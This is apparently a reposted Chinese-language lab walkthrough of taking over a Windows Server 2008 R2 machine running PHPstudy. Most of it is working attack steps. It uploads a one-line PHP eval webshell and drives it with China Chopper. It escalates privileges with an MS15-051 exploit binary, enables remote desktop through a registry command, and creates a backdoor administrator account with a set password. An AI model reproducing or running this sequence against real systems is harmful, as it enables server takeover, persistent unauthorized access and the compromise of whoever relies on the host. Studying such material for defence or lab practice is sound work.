作業系統: Windows Server 2008 R2 Enterprise
Web環境: PHPstudy( PHP+Apache+MySQL)
第一步,上傳一句話木馬到Web網站根路徑并使用中國菜刀連接
<?php eval($_POST[-7]);?>
第二步,使用中國菜刀查看系統資訊,根據系統沒安裝的補丁進行提權
第三步,使用中國菜刀上傳漏洞工具( 此處使用MS15-051漏洞工具)提權
Windows系統的回收站和c:\windows\Temp目錄默認具有上傳和執行權限,所以我們將漏洞工具上傳至c:\windows\Temp目錄下
使用中國菜刀打開虛擬終端,查看當前用戶權限
C:\phpStudy\PHPTutorial\WWW\> c:\windows\temp\ms15-051x64.exe whoami
第四步,開啟3389( 遠程桌面 )埠
上傳a.bat檔案至c:\windows\temp目錄下,內容為開啟3389埠
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用中國菜刀打開虛擬終端,執行a.bat檔案
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "c:\windows\temp\a.bat"
查看3389埠是否開啟
C:\xxx\WWW\> c:\windows\temp\ms15-051x64.exe "netstat -ano"
第五步,添加管理員用戶
添加普通用戶tom
c:\windows\temp\ms15-051x64.exe "net user tom 123456.qwer /add"
將普通用戶tom添加至管理員組,擁有管理員權限
c:\windows\temp\ms15-051x64.exe "net localgroup administrators tom /add"
第六步,連接遠程桌面
物理機開啟遠程桌面
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289489.html
標籤:其他
上一篇:Struts2反序列化漏洞復現